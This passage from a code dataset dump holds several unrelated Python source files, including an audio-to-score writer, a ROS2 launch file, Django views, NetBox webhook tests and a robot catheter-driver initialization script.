None:\n\t\t\t\t\textra_room_in_minrange = self.instruments[i]['cps'][v]['polyphony_max_db_difference']-minmaxdict['dbrange']\n\t\t\t\t\tself.instrument_tests[i, v]['db2'].append('%%f >= %f and %%f <= %f'%(minmaxdict['dbmin']-extra_room_in_minrange, minmaxdict['dbmax']+extra_room_in_minrange))\n\t\t\t# interval restriction in time\n\t\t\tfor minp, maxp in self.tracker.get_interval_restrictions(self.instruments, i, v, tidx):\n\t\t\t\tfor v in self.instruments[i]['cps']:\n\t\t\t\t\tself.instrument_tests[i, v]['pitch2'].append('%%f >= %f and %%f <= %f'%(minp, maxp))\n\t########################################\n\tdef test_corpus_segment(self, tidx, cobj):\n\t\t'''this test happens on the corpus at a segment-by-segment basis'''\n\t\tif not self.active: return True\n\t\tif len(self.valid_instruments_per_voice[cobj.voiceID]) == 0: return False\n\t\tcobj.instrument_candidates = []\n\n\t\tPITCH = cobj.desc['MIDIPitch-seg'].get(None, None)\n\t\tif cobj.transMethod != None and cobj.transMethod.startswith(\"semitone\"):\n\t\t\t# exception for midipitch to incorporate transposition\n\t\t\tPITCH += float(cobj.transMethod.split()[1])\n\t\tDB = util.ampToDb(cobj.desc['power-seg'].get(None, None)) + cobj.envDb\n\t\t\n\t\tfor i in self.valid_instruments_per_voice[cobj.voiceID]:\n\t\t\tadd_this_instr = True\n\t\t\t################################################\n\t\t\t## test for descriptor-based polophony limits ##\n\t\t\t################################################\n\t\t\ttests = []\n\t\t\t# single pitch conditionals\n\t\t\ttests.extend([teststring%(PITCH) for teststring in self.instrument_tests[i, cobj.voiceID]['pitch']])\n\t\t\t# double pitch conditionals\n\t\t\ttests.extend([teststring%(PITCH, PITCH) for teststring in self.instrument_tests[i, cobj.voiceID]['pitch2']])\n\t\t\t# double dB conditionals\t\t\t\n\t\t\ttests.extend([teststring%(DB, DB) for teststring in self.instrument_tests[i, cobj.voiceID]['db2']])\n\t\t\tfor t in tests:\n\t\t\t\tif not eval(t):\n\t\t\t\t\tadd_this_instr = False\n\t\t\t\t\tbreak\n\n\t\t\tif add_this_instr: cobj.instrument_candidates.append(i)\n\t\tif len(cobj.instrument_candidates) == 0: return False\n\t\telse: return True\n\t########################################\n\tdef increment(self, start, dur, eobj):\n\t\tif not self.active: return\n\t\tif eobj.sfseghandle.instrTag not in self.instrument_names:\n\t\t\teobj.selectedinstrument = None\n\t\t\tself.tracker.noninstrument_num_notes += 1\n\t\t\treturn\n\t\t# if we're passing this point, we're picking the instrument\n\t\tvc = eobj.sfseghandle.voiceID\n\t\teobj.selectedinstrument = eobj.sfseghandle.instrument_candidates[0]\n\t\teobj.selectedInstrumentIdx = self.instrumentNameToIdx[eobj.selectedinstrument]\n\t\tthisinstr = self.instruments[eobj.selectedinstrument]\n\t\t# increment shit\n\t\tif thisinstr['cps'][vc]['temporal_mode'] == 'artic': dur = 1\n\t\tself.tracker.addnote(eobj.selectedinstrument, eobj.sfseghandle.voiceID, start, dur, thisinstr['cps'][eobj.sfseghandle.voiceID]['cobj_to_pitch'][eobj.sfseghandle], eobj.rmsSeg+eobj.envDb, thisinstr['cps'][vc]['technique'])\n\t########################################\n\tdef write(self, outputEvents):\n\t\tif not self.active: return\n\n\t\tdictByInstrument = {}\n\t\tfor eobj in outputEvents:\n\t\t\tif eobj.selectedinstrument == None: continue\n\t\t\tif eobj.selectedinstrument not in dictByInstrument: dictByInstrument[eobj.selectedinstrument] = {}\n\t\t\tthiscps = self.instruments[eobj.selectedinstrument]['cps'][eobj.voiceID]\n\t\t\ttimeinMs = 
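setup_corpus_tests builds its pitch and dB limits as printf-style strings ('%f >= ... and %f <= ...') that test_corpus_segment later runs through eval() for every candidate segment. A sketch of the same bound checks written as closures instead, which avoids repeated string formatting and parsing; the bounds here are invented for illustration:

def in_range(lo, hi):
    # closure equivalent of the '%%f >= %f and %%f <= %f' test strings
    return lambda value: lo <= value <= hi

def not_equal(p):
    # closure equivalent of the '%%f != %f' unison test
    return lambda value: value != p

tests = [in_range(48.0, 72.0), not_equal(60.0)]   # e.g. a MIDI pitch window plus a unison ban
PITCH = 61.0
print(all(test(PITCH) for test in tests))  # True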
int(eobj.timeInScore*1000)\n\t\t\tdurationInMs = int(eobj.tgtsegdur*1000) # cps duration may be modified by clipDurationToTarget; duration is the sf duration.\n\t\t\tpitchInCents = thiscps['cobj_to_pitch'][eobj.sfseghandle]*100\n\t\t\tdb = eobj.envDb\n\t\t\tif db < -60: db = -60\n\t\t\tamp127 = int((util.dbToAmp(db)-util.dbToAmp(-60))/(1-util.dbToAmp(-60)) * 127)\n\n\t\t\t# do slots stuff\n\t\t\tslotAssignEveryNote = [(1, 'technique', str(thiscps['technique']), 'text'), (2, 'temporal_mode', thiscps['temporal_mode'], 'text'), (3, 'selectnumber', int(eobj.simSelects), 'int'), (10, 'fullpath', eobj.filename, 'text'), (11, 'filename', eobj.printName, 'text'), (12, 'sfskiptime', eobj.sfSkip*1000, 'float'), (13, 'db_scale', eobj.envDb, 'float'), (14, 'sftransposition', eobj.transposition, 'float'), (15, 'sfchannels', int(eobj.sfchnls), 'int')]\n\t\t\tslotDataOnlyOnce = {}\n\t\t\tif eobj.dynamicFromFilename != None:\n\t\t\t\tslotDataOnlyOnce[20] = eobj.dynamicFromFilename\n\t\t\telse:\n\t\t\t\tslotDataOnlyOnce[20] = self.instruments[eobj.selectedinstrument]['cps'][eobj.voiceID]['cobj_to_dyn'][eobj.sfseghandle]\n\t\t\tif thiscps['articulation'] != None:\n\t\t\t\tslotDataOnlyOnce[22] = \"%s\"%thiscps['articulation']\n\t\t\tif thiscps['notehead'] != None:\n\t\t\t\tslotDataOnlyOnce[23] = \"%s\"%thiscps['notehead']\n\t\t\tif thiscps['annotation'] != None:\n\t\t\t\tslotDataOnlyOnce[24] = \"%s\"%thiscps['annotation']\n\n\n\n\t\t\tif timeinMs not in self.instruments[eobj.selectedinstrument]['notes']:\n\t\t\t\tself.instruments[eobj.selectedinstrument]['notes'][timeinMs] = [[], slotDataOnlyOnce]\n\t\t\tself.instruments[eobj.selectedinstrument]['notes'][timeinMs][0].append([pitchInCents, durationInMs, amp127, slotAssignEveryNote])\n\t\t\n\t\tbachstring = 'roll '\n\t\t# set up clefs\n\t\tclefs = ['clefs'] + [self.instruments[i]['params'].params['clef'] for i in self.instruments]\n\t\tbachstring += \"[%s] \"%' '.join(clefs)\n\t\t# set up voices\n\t\tvoicenames = ['voicenames'] + [self.instruments[i]['displayname'] for i in self.instruments]\n\t\tbachstring += \"[%s] \"%' '.join(voicenames)\n\t\t# slots\n\t\tcustomslots = ['[%i [type %s] [name %s]]'%(slotnumb, slottype, slotname) for slotnumb, slotname, slotdata, slottype in slotAssignEveryNote]\n\t\tbachstring += '[slotinfo %s]'%' '.join(customslots)\n\t\t# [2 [type text] [name french]] [3 [type text] [name italian]]\n\t\t# \n\t\tfor instru in self.instruments:\n\t\t\tbachstring += '[ ' # instrument start\n\t\t\tfor time, (notelist, slotDict) in self.instruments[instru]['notes'].items():\n\t\t\t\tbachstring += '[%i.'%time # note start\n\t\t\t\tfor didx, d in enumerate(notelist):\n\t\t\t\t\t# only write slots for first note\n\t\t\t\t\talways = ' '.join(['[%i %s]'%(slotnumb, slotdata) for slotnumb, slotname, slotdata, slottype in d[3]])\n\t\t\t\t\tif didx == 0:\n\t\t\t\t\t\tonce = ' '.join(['[%i %s]'%(slotnumb, slotDataOnlyOnce) for slotnumb, slotDataOnlyOnce in slotDict.items()])\n\t\t\t\t\t\tslotstring = '[slots %s %s ]'%(once, always)\n\t\t\t\t\telse: #already wrote slots on a prev not in this chord\n\t\t\t\t\t\tslotstring = '[slots %s ]'%(always)\n\t\t\t\t\tbachstring += ' [%i %i %i %s] '%(d[0], d[1], d[2], slotstring)\n\t\t\t\tbachstring += '] ' # note end\n\t\t\tbachstring += '] ' # instrument end\n\t\t\t\n\t\tfh = open(self.outputfile, 
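The amp127 line above rescales a decibel value onto the 0-127 MIDI velocity range, with -60 dB pinned to 0. A worked version, assuming util.dbToAmp is the usual amplitude conversion 10**(db/20) (that definition is not shown in this file, so treat it as an assumption):

def db_to_amp(db):
    return 10 ** (db / 20.0)  # assumed behaviour of util.dbToAmp

def db_to_velocity(db, floor_db=-60):
    db = max(db, floor_db)  # the writer clips at -60 dB as well
    scale = (db_to_amp(db) - db_to_amp(floor_db)) / (1 - db_to_amp(floor_db))
    return int(scale * 127)

print(db_to_velocity(0))    # 127
print(db_to_velocity(-60))  # 0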
'w')\n\t\tfh.write(bachstring)\n\t\tfh.close()\n\t########################################\n\n\n\n\n","sub_path":"audioguide/musicalwriting.py","file_name":"musicalwriting.py","file_ext":"py","file_size_in_byte":23816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"43033069","text":"from launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument\nfrom launch.conditions import IfCondition\nfrom launch.substitutions import Command, FindExecutable, LaunchConfiguration, PathJoinSubstitution\nfrom launch.actions import IncludeLaunchDescription, ExecuteProcess\nfrom launch_ros.actions import Node\nfrom launch_ros.substitutions import FindPackageShare\n\n\ndef generate_launch_description():\n\n urdf_file='/home/luqman/ros2_workspace/src/bazu_6dof/urdf/bazu_gazebo_controller_position.urdf'\n return LaunchDescription([\n # publishes TF for links of the robot without joints\n Node(\n package='robot_state_publisher',\n executable='robot_state_publisher',\n name='robot_state_publisher',\n output='screen',\n arguments=[urdf_file]),\n # To publish tf for Joints only links\n Node(\n package='joint_state_publisher',\n executable='joint_state_publisher',\n name='joint_state_publisher',\n output='screen',\n ),\n# Gazebo related stuff required to launch the robot in simulation\n ExecuteProcess(\n cmd=['gazebo', '--verbose', '-s', 'libgazebo_ros_factory.so'],\n output='screen'),\n Node(\n package='gazebo_ros',\n executable='spawn_entity.py',\n name='urdf_spawner',\n output='screen',\n arguments=[\"-topic\", \"/robot_description\", \"-entity\", \"bazu\"]),\n \n# Running the controllers in launch file\n ExecuteProcess(\n cmd=['ros2', 'control', 'load_controller', '--set-state', 'start','joint_state_broadcaster'],\n output='screen'\n ),\n\n ExecuteProcess(\n cmd=['ros2', 'control', 'load_controller', '--set-state', 'start', 'forward_position_controller'],\n output='screen'\n )\n ])\n# after this simple simulation launcher we need to launch the controllers manually\n\n# - run the commands to load the controller as described in your controller names\n# - ***\"ros2 control load_controller forward_position_controller\"***\n# - Now configure it\n# - ***ros2 control set_controller_state forward_position_controller configure***\n# - Start the Controller\n# - ***ros2 control switch_controllers --start forward_position_controller***\n\n# \"data:\n# - 0.5\n# - 0.5\n# - 0.5\n# - 0.5\n# - 0.5\n# - 0.5\"\n","sub_path":"bazu_6dof/launch/3_position_controller.launch.py","file_name":"3_position_controller.launch.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"284529788","text":"from django.shortcuts import render\nfrom listings.models import Listing as lst\nfrom realtors.models import Realtor as rltr\nfrom listings.choices import bedroom_choices,price_choices,state_choices\n# Create your views here.\ndef HomePage(request):\n list = lst.objects.order_by('-list_date')[0:3]\n context = {\n 'state_choices':state_choices,\n 'bedroom_choices':bedroom_choices,\n 'price_choices':price_choices,\n 'listings' : list,\n }\n return render(request,'testapp/homepage.html',context)\n\ndef About(request):\n #get all realtors\n realtors_all = rltr.objects.order_by('-hire_date')\n #get mvp\n realtors_mvp = rltr.objects.all().filter(is_mvp = True)\n\n context = {'realtors' : realtors_all,'mvp_realtors' : realtors_mvp,}\n\n return 
render(request,'testapp/about.html',context)\n","sub_path":"testapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"614306438","text":"\n\ndef avoids( word, avoiding ):\n\t\t\"\"\"avoids returns True if none of the letters in the list avoiding are in the word\"\"\"\n\t\tfor letter in avoiding:\n\t\t\tif letter in word:\n\t\t\t\treturn False\n\n\t\treturn True\n\ndef get_list():\n\t\tletters = []\n\t\twhile True:\n\t\t\t\tx = input(\"enter a letter to avoid or end to finish:\\n\")\n\t\t\t\tif str(x) == \"end\":\n\t\t\t\t\t\tbreak\n\t\t\t\tletters.append(x.strip())\n\t\treturn letters\n\n\n\nmy_file = open('words.txt')\n#avoid_list = ['a','e','i','o','u']\ncount = 0\navoid_list = get_list()\nprint(avoid_list)\n\nfor line in my_file:\n\tword = line.strip()\n\tif avoids(word,avoid_list) :\n\t\t\tprint(word)\n\t\t\tcount += 1\n\nprint(\"number of words = {count}\".format(count=count))\n\t\n","sub_path":"ch9_word_play/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"332925570","text":"# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\nfrom os import path, environ\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\n\nhere = path.abspath(path.dirname(__file__))\ninstall_reqs = parse_requirements('requirements.txt')\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nif environ.get('CI_COMMIT_TAG'):\n version = environ['CI_COMMIT_TAG']\nelif environ.get('CI_JOB_ID'):\n version = environ['CI_JOB_ID']\nelse:\n version = 'dev'\n\n\nsetup(\n name='meos_sdk', # Required\n version=version, # Required\n description='Interact with the meos personal cloud environment',\n long_description=long_description, # Optional\n long_description_content_type='text/markdown', # Optional (see note above)\n classifiers=[ # Optional\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required\n python_requires='>=3.5, <4',\n install_requires=install_reqs,\n include_package_data=True,\n entry_points={\n 'console_scripts': [\n 'meos_sdk = meos_sdk.cli:meos_sdk',\n ],\n },\n)\n","sub_path":"pypi_install_script/meos_sdk-0.0.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"22328938","text":"import django_rq\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom dcim.models import Site\nfrom extras.choices import ObjectChangeActionChoices\nfrom extras.models import Webhook\nfrom utilities.testing import APITestCase\n\n\nclass WebhookTest(APITestCase):\n\n def setUp(self):\n\n super().setUp()\n\n self.queue = django_rq.get_queue('default')\n self.queue.empty() # Begin each test with an empty queue\n\n @classmethod\n def 
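parse_requirements in the setup.py above iterates a generator over open(filename) without ever closing the handle. A variant with the same filtering that closes the file deterministically:

def parse_requirements(filename):
    """Load requirements from a pip requirements file, closing the handle."""
    with open(filename) as f:
        lines = (line.strip() for line in f)
        return [line for line in lines if line and not line.startswith("#")]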
setUpTestData(cls):\n\n site_ct = ContentType.objects.get_for_model(Site)\n PAYLOAD_URL = \"http://localhost/\"\n webhooks = Webhook.objects.bulk_create((\n Webhook(name='Site Create Webhook', type_create=True, payload_url=PAYLOAD_URL),\n Webhook(name='Site Update Webhook', type_update=True, payload_url=PAYLOAD_URL),\n Webhook(name='Site Delete Webhook', type_delete=True, payload_url=PAYLOAD_URL),\n ))\n for webhook in webhooks:\n webhook.obj_type.set([site_ct])\n\n def test_enqueue_webhook_create(self):\n\n # Create an object via the REST API\n data = {\n 'name': 'Test Site',\n 'slug': 'test-site',\n }\n url = reverse('dcim-api:site-list')\n response = self.client.post(url, data, format='json', **self.header)\n self.assertHttpStatus(response, status.HTTP_201_CREATED)\n self.assertEqual(Site.objects.count(), 1)\n\n # Verify that a job was queued for the object creation webhook\n self.assertEqual(self.queue.count, 1)\n job = self.queue.jobs[0]\n self.assertEqual(job.args[0], Webhook.objects.get(type_create=True))\n self.assertEqual(job.args[1]['id'], response.data['id'])\n self.assertEqual(job.args[2], 'site')\n self.assertEqual(job.args[3], ObjectChangeActionChoices.ACTION_CREATE)\n\n def test_enqueue_webhook_update(self):\n\n site = Site.objects.create(name='Site 1', slug='site-1')\n\n # Update an object via the REST API\n data = {\n 'comments': 'Updated the site',\n }\n url = reverse('dcim-api:site-detail', kwargs={'pk': site.pk})\n response = self.client.patch(url, data, format='json', **self.header)\n self.assertHttpStatus(response, status.HTTP_200_OK)\n\n # Verify that a job was queued for the object update webhook\n self.assertEqual(self.queue.count, 1)\n job = self.queue.jobs[0]\n self.assertEqual(job.args[0], Webhook.objects.get(type_update=True))\n self.assertEqual(job.args[1]['id'], site.pk)\n self.assertEqual(job.args[2], 'site')\n self.assertEqual(job.args[3], ObjectChangeActionChoices.ACTION_UPDATE)\n\n def test_enqueue_webhook_delete(self):\n\n site = Site.objects.create(name='Site 1', slug='site-1')\n\n # Delete an object via the REST API\n url = reverse('dcim-api:site-detail', kwargs={'pk': site.pk})\n response = self.client.delete(url, **self.header)\n self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)\n\n # Verify that a job was queued for the object update webhook\n self.assertEqual(self.queue.count, 1)\n job = self.queue.jobs[0]\n self.assertEqual(job.args[0], Webhook.objects.get(type_delete=True))\n self.assertEqual(job.args[1]['id'], site.pk)\n self.assertEqual(job.args[2], 'site')\n self.assertEqual(job.args[3], ObjectChangeActionChoices.ACTION_DELETE)\n","sub_path":"netbox/extras/tests/test_webhooks.py","file_name":"test_webhooks.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"462362312","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.contrib.postgres.fields\nimport localflavor.us.models\nimport django.contrib.gis.db.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gridentities', '0007_auto_20160223_0007'),\n\n # all other apps have linked to balancing authority, needed for running tests\n ('griddata', '0001_initial'),\n ('carbon', '0001_initial'),\n ('marginal', '0001_initial'),\n ('datafile', '0001_initial'),\n ('hooks', '0001_initial'),\n ('spatial_predictors', '0001_initial'),\n ]\n\n operations = [\n 
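The create/update/delete webhook tests that follow all end with the same five assertions on the queued job. One way to share that tail is a helper method on the test class; this is a sketch, not code from the original file:

def assert_single_job(self, flag, expected_id, expected_action):
    # common tail of the three tests: exactly one job, queued with these args
    self.assertEqual(self.queue.count, 1)
    job = self.queue.jobs[0]
    self.assertEqual(job.args[0], Webhook.objects.get(**{flag: True}))
    self.assertEqual(job.args[1]['id'], expected_id)
    self.assertEqual(job.args[2], 'site')
    self.assertEqual(job.args[3], expected_action)

# e.g. in test_enqueue_webhook_create:
# self.assert_single_job('type_create', response.data['id'], ObjectChangeActionChoices.ACTION_CREATE)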
migrations.RenameModel('BalancingAuthority', 'GridLocation'),\n        migrations.AlterField(\n            model_name='gridareacollection',\n            name='areas',\n            field=models.ManyToManyField(to='gridentities.GridLocation'),\n        ),\n    ]\n","sub_path":"watttime_grid_api/apps/gridentities/migrations/0008_auto_20160223_0134.py","file_name":"0008_auto_20160223_0134.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"238751119","text":"'''\ninitialize_robot.py runs all the communication commands that were originally in IDM.py\nPerforms the initial contact, homing and tensioning.\n'''\nimport sys, time\nfrom robot.devices.xbox_controller.xbox_wrapper import xbox\n\n\n# The maximum velocity at which the IDMApp will allow us to go (mm / sec).\nmaxVelMMS = 150.0\n# Length, in milliseconds, of a single cycle of the IDM App. \n# remove some time for system delay\ncycleTimeS = 4.0 / 1000.0\n\n# Possible states of the IDM\nIDMStates = { \"Init\" : 0,\n              \"Initialized\" : 1,\n              \"Powering\" : 2,\n              \"Powered\": 3,\n              \"Homing\" : 4,\n              \"Ready\" : 5,\n              \"Follow\" : 6,\n              \"Tensioning\" : 7,\n              \"Fault\" : 8}\n# Possible Commands to send to the IDMApp.\nIDMCmd = { \"POWERON\" : 0,\n           \"POWEROFF\" : 1,\n           \"START_HOME\" : 2,\n           \"STOP_HOME\" : 3,\n           \"START_FOLLOW\" : 6,\n           \"STOP_FOLLOW\" : 7,\n           \"TENSION_SHEATH\" : 8,\n           \"TENSION_LEADER\" : 9,\n           \"TENSION_BOTH\" : 10,\n           \"TENSION_STOP\" : 11}\n\n\n# key function:\ndef initialize_system(domainId = 5, # not sure what 5 is doing\n                      sheath = \"BAS08\", \n                      leader = \"BAL08\", \n                      tension = False):\n\n    # handle to auris communication\n    from robot.private.AurisLowLevel import PyAurisInterface\n    g_PyAuris = PyAurisInterface() \n    # Setup Network\n    err = g_PyAuris.Initialize(domainId, None)\n    if (err != 0):\n        print(\"Failed to connect RTI (\", err, \")\")\n        input(\"Press Enter to exit ...\")\n        sys.exit(-1)\n    err = g_PyAuris.EstablishIDMConnection()\n    if (err != 0):\n        print(\"Failed to connect to IDM (\", err, \")\")\n        input(\"Press Enter to exit ...\")\n        sys.exit(-1)\n\n    # home the system and place it in the ready state\n    err = GoToReadyState(g_PyAuris)\n    if (err != 0):\n        print(\"Failed to enter Ready State.\")\n        input(\"Press Enter to exit ...\")\n        sys.exit(-1)\n\n    tension_sheath = False\n    tension_leader = False\n    if tension:\n        input(\"Load Catheter Now. Press enter to load and tension ...\\n\")\n        tension_input = input(\"Do you want to tension the sheath? (y/n)...\\n\")\n        tension_sheath = True if tension_input.lower() == 'y' else False\n        leader_input = input(\"Do you want to tension the leader too? (y/n)...\\n\")\n        tension_leader = True if leader_input.lower() == 'y' else False\n\n    err = LoadCathetersAndFollow(g_PyAuris, sheath = sheath, leader = leader, tension_sheath = tension_sheath, tension_leader = tension_leader)\n    if (err != 0):\n        print(\"Failed to Load Catheters.\")\n        input(\"Press Enter to exit ...\")\n        sys.exit(-1)\n\n    xbox_handle = InitializeGamePad(g_PyAuris)\n\n    return g_PyAuris, xbox_handle\n    \n\n#### IDM States functions #####\ndef StateFromInt(idmState):\n    \"\"\" Returns a string IDM state given the integer number of the state.\n    Returns an empty string if no such state is found. \"\"\"\n    keys = [key for key, value in IDMStates.items() if value == idmState]\n    if len(keys) != 1:\n        return \"\"\n    else:\n        return keys[0]\n\ndef IntFromState(idmState):\n    \"\"\" Returns an integer IDM state given the string name of the state.\n    Throws KeyError. 
\"\"\"\n    return IDMStates[idmState]\n\ndef CmdFromInt(idmCmd):\n    \"\"\" Returns a string IDM command given the integer number of the command.\n    Returns an empty string if no such command is found. \"\"\"\n    keys = [key for key, value in IDMCmd.items() if value == idmCmd]\n    if len(keys) != 1:\n        return \"\"\n    else:\n        return keys[0]\n\ndef IntFromCmd(idmCmd):\n    \"\"\" Returns an integer IDM command given the string name of the command.\n    Throws KeyError. \"\"\"\n    return IDMCmd[idmCmd]\n\n\n################# Basic IDM Commands to Initialize ######################################\n\ndef LoadLeader(g_PyAuris, instrument):\n    \"\"\" Loads a leader instrument. \"\"\"\n    return g_PyAuris.LoadLeader(instrument)\n\ndef LoadSheath(g_PyAuris, instrument):\n    \"\"\" Loads a sheath instrument. \"\"\"\n    return g_PyAuris.LoadSheath(instrument)\n\ndef EnablePower(g_PyAuris):\n    \"\"\" Sends enable power command to the IDM. \"\"\"\n    return g_PyAuris.SendIDMCommand(IntFromCmd(\"POWERON\"))\n\ndef DisablePower(g_PyAuris):\n    \"\"\" Sends disable power command to the IDM. \"\"\"\n    return g_PyAuris.SendIDMCommand(IntFromCmd(\"POWEROFF\"))\n\ndef StartHoming(g_PyAuris):\n    \"\"\" Sends start homing the IDM. \"\"\"\n    return g_PyAuris.SendIDMCommand(IntFromCmd(\"START_HOME\"))\n\ndef StartFollow(g_PyAuris, timeout=2000):\n    \"\"\" Figures out how to get IDM to start following (i.e., be able to accept\n    commands).\n    Args:\n      timeout: milliseconds of timeout. \"\"\"\n    end_time = time.time() + timeout / 1000.0\n    while time.time() < end_time:\n        status = GetStatus(g_PyAuris)\n        print(repr(status))\n        if status == IDMStates[\"Follow\"]:\n            return 0\n        elif status == IDMStates[\"Fault\"]:\n            print(\"IDM in Fault state.\")\n            return -1\n        elif status == IDMStates[\"Ready\"]:\n            g_PyAuris.SendIDMCommand(IDMCmd[\"START_FOLLOW\"])\n            # Wait a moment to let the follow command take effect.\n            time.sleep(0.6)\n            return 0\n        elif status == IDMStates[\"Init\"] or status == IDMStates[\"Initialized\"]:\n            # Sometimes there are issues when we just started a connection and\n            # still need some time to get the data.\n            time.sleep(0.6)\n            if status == IDMStates[\"Init\"] or status == IDMStates[\"Initialized\"]:\n                g_PyAuris.SendIDMCommand(IDMCmd[\"POWERON\"])\n        elif status == IDMStates[\"Powered\"]:\n            g_PyAuris.SendIDMCommand(IDMCmd[\"START_HOME\"])\n        time.sleep(0.1)\n    # the IDM never reached the Follow state within the timeout\n    print(\"StartFollow timed out.\")\n    return -1\n\ndef InitializeGamePad(g_PyAuris):\n    \"\"\" Turn the game pad on. Must init system first. \"\"\"\n    xbox_handle = xbox(g_PyAuris)\n    return xbox_handle\n\ndef InitializeSystemMinimally(g_PyAuris, domainId):\n    # Setup Network\n    err = g_PyAuris.Initialize(domainId, None)\n    if (err != 0):\n        print(\"Failed to connect RTI (\", err, \")\")\n        input(\"Press Enter to exit ...\")\n        sys.exit(-1)\n    err = g_PyAuris.EstablishIDMConnection()\n    if (err != 0):\n        print(\"Failed to connect to IDM (\", err, \")\")\n        input(\"Press Enter to exit ...\")\n        sys.exit(-1)\n\n\n\ndef GetStatus(g_PyAuris):\n    \"\"\" Returns the current IDM status (int). \"\"\"\n    return g_PyAuris.GetIDMStatus()\n\ndef GoToReadyState(g_PyAuris):\n    \"\"\" Moves IDM into Ready State so we can next load a catheter. 
\"\"\"\n print(\"Putting IDM in Ready State\")\n state = \"START\"\n done = False\n printOnce = True\n while (not done):\n sys.stdout.flush()\n time.sleep(0.01)\n status = GetStatus(g_PyAuris)\n if (state == \"START\"):\n # figure out where we are at start\n if (status == IDMStates[\"Ready\"]):\n state = \"READY\"\n continue\n elif (status == IDMStates[\"Init\"]):\n if (printOnce):\n print(\"Waiting for system to Initialize.\")\n printOnce = False\n continue\n elif (status == IDMStates[\"Initialized\"]):\n print(\"System Initialized. Enabling Power.\")\n g_PyAuris.SendIDMCommand(IntFromCmd(\"POWERON\"))\n state = \"DO_POWER\"\n continue\n elif (status == IDMStates[\"Powering\"] \\\n or status == IDMStates[\"Powered\"]):\n print(\"Waiting for System to Power.\")\n state = \"DO_POWER\"\n continue\n elif (status == IDMStates[\"Homing\"]):\n print(\"Waiting for System to Home.\")\n state = \"DO_HOME\"\n continue\n elif (status == IDMStates[\"Follow\"]):\n print(\"Stopping Follow Master.\")\n g_PyAuris.SendIDMCommand(IntFromCmd(\"STOP_FOLLOW\"))\n state = \"DO_STOP\"\n continue\n elif (status == IDMStates[\"Fault\"]):\n print(\"System is in Fault. Please restart the IDMApp\",\n \"before running this script\")\n return -1\n else:\n print(\"Not sure what to do in state (\", StateFromInt(status), \")\")\n return -1\n elif (state == \"DO_POWER\"):\n if (status == IDMStates[\"Powered\"]):\n print(\"System Powered. Doing Homing.\\n\")\n input(\"Press enter to home. Make sure the catheter module is disconnected.\\n\")\n # print(g_PyAuris.GetMotorCurrents())\n g_PyAuris.SendIDMCommand(IntFromCmd(\"START_HOME\"))\n state = \"DO_HOME\"\n continue\n elif (state == \"DO_HOME\"):\n if (status == IDMStates[\"Ready\"]):\n # print(\"System Homed.\\n\")\n state = \"READY\"\n continue\n elif (state == \"DO_STOP\"):\n if (status == IDMStates[\"Ready\"]):\n print(\"System Stopped.\\n\")\n state = \"READY\"\n continue\n elif (state == \"READY\"):\n if (status == IDMStates[\"Ready\"]):\n print(\"System Ready.\\n\")\n return 0\n else:\n print(\"Unknown State (\", state,\n \"): status (\"+ StateFromInt(status), \")\")\n\ndef LoadCathetersAndFollow(g_PyAuris, sheath = 'BS38', leader = 'BL36', tension_sheath = False, tension_leader = False):\n \"\"\" Load the catheter tension and start follow. \"\"\"\n print(\"Loading Catheters.\")\n state = \"START\"\n done = False\n printOnce = True\n while (not done):\n sys.stdout.flush()\n time.sleep(0.01)\n status = GetStatus(g_PyAuris)\n if (state == \"START\"):\n if (status != IDMStates[\"Ready\"]):\n print(\"System must be in Ready State.\")\n return -1\n else:\n state = \"LOAD_LEADER\"\n continue\n elif (state == \"LOAD_LEADER\"):\n if leader:\n print(\"Loading Leader.\")\n err = LoadLeader(g_PyAuris, leader)\n if (err != 0):\n print(\"Failed to Load Leader (%s).\" % (str(err)));\n return -1\n state = \"LOAD_SHEATH\"\n continue\n elif (state == \"LOAD_SHEATH\"):\n if sheath:\n print(\"Loading Sheath.\")\n err = LoadSheath(g_PyAuris, sheath)\n if (err != 0):\n print(\"Failed to Load Sheath (%s).\" % (str(err)));\n return -1\n state = \"DO_TENSION\"\n continue\n elif (state == \"DO_TENSION\"):\n if tension_leader or tension_sheath:\n print(\"Catheters Selected. 
